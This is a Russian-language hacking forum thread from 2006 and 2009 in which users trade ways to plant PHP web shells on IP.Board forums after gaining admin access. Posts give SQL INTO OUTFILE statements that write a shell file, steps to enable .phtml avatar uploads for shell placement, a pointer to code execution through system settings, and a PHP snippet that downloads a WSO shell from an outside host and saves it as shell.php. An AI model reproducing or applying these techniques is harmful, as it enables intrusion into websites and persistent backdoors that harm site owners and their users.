ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 25.09.2006, 02:21
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
Провел на форуме:
770940

Репутация: 23
Отправить сообщение для Dimazzz с помощью ICQ
По умолчанию

Проблема такая!

Имею доступ к админке IPB 2.1.6
но не могу залить шелл ни через атачи (меняет разрешение и PHP не выполняется наверно потомучто в папку upload)

также немогу через смайлы =( нет доступа

Какие есть еще варианты залить шелл??
 
Ответить с цитированием

  #22  
Старый 25.09.2006, 14:52
qPhoenix
Banned
Регистрация: 15.12.2005
Сообщений: 95
Провел на форуме:
1509352

Репутация: 132
Отправить сообщение для qPhoenix с помощью ICQ
По умолчанию

Можно через мускуль...

к примеру:

CREATE TABLE `ibf_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ;
INSERT INTO `ibf_shell` ( `shl` ) VALUES (`пхп-код`);
SELECT `shl` FROM `ibf_shell` INTO OUTFILE `путь/имяфайла.php`
DROP TABLE `ibf_shell`
 
Ответить с цитированием

  #23  
Старый 25.09.2006, 14:56
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Для всех чтоыб не было проблемм с заливкой шеллов.
В версиях 1.*-2.0.* шелл заливаеться через смайлы.
Потом просто заходим по такому пути как залили http://www.site.pru/patch_forum/html/emoticons/name_shell.php.
В версиях 2.1.* шелл заливаеться через аватары.
Предварительно берём добавляем в типы файлов расшифрение .phtml и ставим mime тип application/octet-stream , следовательно там же указываем разрешение загрузку аватар и фотографий.
Потом добавляем в профилях пользователей заливка расшифрений .phtml и размер любой ( чем больше тем лучше).
Потом спокойно заливаем шелл и в свойствах смотрим путь до шелла.
Причины почему шелл не залился: Стоят права на папки avatars или html/emoticons, стоит safe-mod.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #24  
Старый 25.09.2006, 15:13
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
Провел на форуме:
770940

Репутация: 23
Отправить сообщение для Dimazzz с помощью ICQ
По умолчанию

Цитата:
Сообщение от SanyaX  
Для всех чтоыб не было проблемм с заливкой шеллов.
В версиях 1.*-2.0.* шелл заливаеться через смайлы.
Потом просто заходим по такому пути как залили http://www.site.pru/patch_forum/html/emoticons/name_shell.php.
В версиях 2.1.* шелл заливаеться через аватары.
Предварительно берём добавляем в типы файлов расшифрение .phtml и ставим mime тип application/octet-stream , следовательно там же указываем разрешение загрузку аватар и фотографий.
Потом добавляем в профилях пользователей заливка расшифрений .phtml и размер любой ( чем больше тем лучше).
Потом спокойно заливаем шелл и в свойствах смотрим путь до шелла.
Причины почему шелл не залился: Стоят права на папки avatars или html/emoticons, стоит safe-mod.
3 раз повторяю =) это версия 2.1.6 и через смайлы там в любом случае неплучится так как пра нехватает.
А второй вариан не прокатывает так как после запуска шелла выдает его исходный код, не вы выполняются сценарии в этои папке Uploads
 
Ответить с цитированием

  #25  
Старый 25.09.2006, 15:22
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Цитата:
Сообщение от Dimazzz  
3 раз повторяю =) это версия 2.1.6 и через смайлы там в любом случае неплучится так как пра нехватает.
А второй вариан не прокатывает так как после запуска шелла выдает его исходный код, не вы выполняются сценарии в этои папке Uploads
ТЫ что чушь гонишь? Я тебе про аватары написал ДЛЯ 2.1.6. причём тут папка uploads?? Шелл грузиться в аватары + расширенеи надо .phtml. Вообщем в посте выше я всё описал. Читать надо внимательней.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #26  
Старый 30.04.2009, 01:15
navigat0r
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739

Репутация: 146
Отправить сообщение для navigat0r с помощью ICQ
По умолчанию

имеется IP.Board v2.3.5
но не могу залить шелл через атачи
также немогу через смайлы
пробывал через стили, тоже не выходит
может кто знает есчо способ??
 
Ответить с цитированием

  #27  
Старый 30.04.2009, 04:04
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

navigat0r там возможно произвольное выполнение php кода , когда добовляеш системную настройку.
Воть нашол у себя, думаю должен понять
Цитата:
http://depositfiles.com/files/17mnmm05v

Последний раз редактировалось warlok; 30.04.2009 в 04:14..
 
Ответить с цитированием

  #28  
Старый 30.04.2009, 11:00
navigat0r
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739

Репутация: 146
Отправить сообщение для navigat0r с помощью ICQ
По умолчанию

делал также как и в видео, мне пишет что страница не найдена.МОжет оно в другое место сохранило?Как узнать куда сохраняет?
$data=implode('',file('http://navigat0r.kilu.de/shell/wso.txt'));
$fp=fopen('./shell.php','wb');
fputs($fp,$data);
fclose($fp);
правильно я написал??
 
Ответить с цитированием

  #29  
Старый 30.04.2009, 11:06
navigat0r
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739

Репутация: 146
Отправить сообщение для navigat0r с помощью ICQ
По умолчанию

короче в этой админке так не катит.Пробывал в других, работает.Тут наверно куда-то в др место сохраняет.Чё можно есчо придумать?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливка шелла T-4 PHP, PERL, MySQL, JavaScript 8 01.01.2006 19:05
Заливка шелла на PHP-Fusion. ilyha Форумы 11 09.12.2005 20:52
Заливка шелла черех смайлы в ipb ..::k0rps::.. Форумы 1 28.11.2005 14:48
Заливка шелла и снятие бана в ipb через mysql darks Форумы 14 26.11.2005 00:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ